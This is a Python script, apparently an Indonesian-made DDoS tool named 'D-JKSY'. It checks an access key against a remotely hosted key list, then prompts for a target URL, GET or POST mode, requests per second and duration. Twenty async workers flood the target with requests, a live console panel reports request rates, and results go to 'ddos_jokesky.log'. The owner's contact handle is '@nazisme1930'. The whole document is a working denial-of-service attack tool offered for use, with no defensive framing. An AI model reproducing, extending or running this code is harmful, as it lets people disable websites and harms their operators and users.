import asyncio, aiohttp, requests, time, os, sys
from datetime import datetime
from rich.console import Console
from rich.panel import Panel

console = Console()
stats = {"total": 0, "success": 0, "failed": 0, "latency": 0}

def write_log(target, mode, total, success, failed):
    # Fungsi untuk mencatat hasil ke ddos_jokesky.log
    with open("ddos_jokesky.log", "a") as f:
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        f.write(f"[{timestamp}] SESSION FINISHED\n")
        f.write(f"Target  : {target}\n")
        f.write(f"Mode    : {mode}\n")
        f.write(f"Total   : {total}\n")
        f.write(f"Success : {success}\n")
        f.write(f"Failed  : {failed}\n")
        f.write("-" * 40 + "\n")

def show_manual():
    console.print("[bold red]>>> D-JKSY ELITE AUTHORITY ACTIVE <<<[/]", justify="center")
    manual = """
[bold white]                         D-JKSY OPERATIONAL MANUAL[/]                         
┏━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━┓
┃ Parameter ┃ Deskripsi                              ┃ Contoh Input        ┃
┡━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━┩
│ URL       │ Alamat target (Wajib pakai http/https) │ https://example.com │
│ Mode      │ Metode pengiriman (GET atau POST)      │ GET                 │
│ RPS       │ Requests Per Second (Kecepatan)        │ 10 - 30             │
│ Duration  │ Lama pengetesan (detik)                │ 60                  │
│ Owner     │ Kontak Telegram Developer              │ @nazisme1930        │
└───────────┴────────────────────────────────────────┴─────────────────────┘
[dim]* Gunakan RPS tinggi hanya jika perangkat & internet stabil.[/]

[bold red]── TIER S CONFIGURATION ──[/]
"""
    console.print(manual)

async def attack_worker(url, mode, rps_limit):
    timeout = aiohttp.ClientTimeout(total=10)
    delay = 1 / (rps_limit / 20) if rps_limit > 0 else 0
    async with aiohttp.ClientSession(timeout=timeout) as session:
        while True:
            t1 = time.perf_counter()
            try:
                headers = {"User-Agent": f"D-JKSY-V9.3-PRO/{time.time()}"}
                if mode.upper() == "POST":
                    req = session.post(url, headers=headers, data={"jksy": "finish"})
                else:
                    req = session.get(url, headers=headers)
                async with req as resp:
                    stats["latency"] = (time.perf_counter() - t1) * 1000
                    stats["total"] += 1
                    if resp.status < 400: stats["success"] += 1
                    else: stats["failed"] += 1
            except:
                stats["total"] += 1
                stats["failed"] += 1
            if delay > 0: await asyncio.sleep(delay)

async def monitor(target, mode, duration):
    start_time = time.time()
    last_total = 0
    os.system('cls' if os.name == 'nt' else 'clear')
    control_panel = f"""╭────────────────────────────── D-JKSY CONTROL CENTER ──────────────────────────────╮
│ OWNER  : JOKESKYLS (@nazisme1930)                                                 │
│ TARGET : {target[:45]} | MODE: {mode.upper():<7} │
│ ENGINE : TIER S ACTIVE                                                            │
╰───────────────────────────────────────────────────────────────────────────────────╯

[bold white]TIME         RPS         LATENCY       SUCCESS         FAIL[/]
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"""
    console.print(control_panel)

    while time.time() - start_time < duration:
        await asyncio.sleep(1)
        current_total = stats["total"]
        rps = current_total - last_total
        last_total = current_total
        now = datetime.now().strftime("%H:%M:%S")
        log_line = f"{now:<12} {rps:<11} {stats['latency']:.0f}ms{'' : <10} {stats['success']:<15} {stats['failed']}"
        console.print(log_line)

async def main():
    os.system('cls' if os.name == 'nt' else 'clear')
    try:
        r = requests.get("https://raw.githubusercontent.com/iamkhy11/d-jksy/main/keys.txt", timeout=10)
        keys = [k.strip() for k in r.text.splitlines()]
    except:
        console.print("[bold red][!] Authority Server Offline[/]")
        return

    console.print("[bold red]>>> D-JKSY AUTHORITY SYSTEM <<<[/]\n", justify="center")
    key_input = console.input("[bold white]ACCESS KEY : [/]").strip()
    
    if key_input not in keys:
        console.print("[bold red][!] UNKNOWN AUTHORITY[/]")
        return

    os.system('cls' if os.name == 'nt' else 'clear')
    show_manual()
    
    target   = console.input("[bold white] URL             : [/]").strip()
    mode     = console.input("[bold white] Mode (GET/POST) : [/]").strip()
    rps_val  = int(console.input("[bold white] Target RPS      : [/]"))
    duration = int(console.input("[bold white] Duration (sec)  : [/]"))

    workers = [attack_worker(target, mode, rps_val) for _ in range(20)]
    monitor_task = asyncio.create_task(monitor(target, mode, duration))
    
    try:
        await asyncio.wait_for(asyncio.gather(*workers), timeout=duration)
    except asyncio.TimeoutError:
        pass
    
    # Mencatat hasil ke file log
    write_log(target, mode, stats['total'], stats['success'], stats['failed'])
    
    console.print(f"\n[bold green]FINISH[/] | Stats saved to [bold white]ddos_jokesky.log[/]")
    console.print(f"[bold white]Total Reqs: {stats['total']} | Success: {stats['success']} | Failed: {stats['failed']}[/]")

if __name__ == "__main__":
    asyncio.run(main())
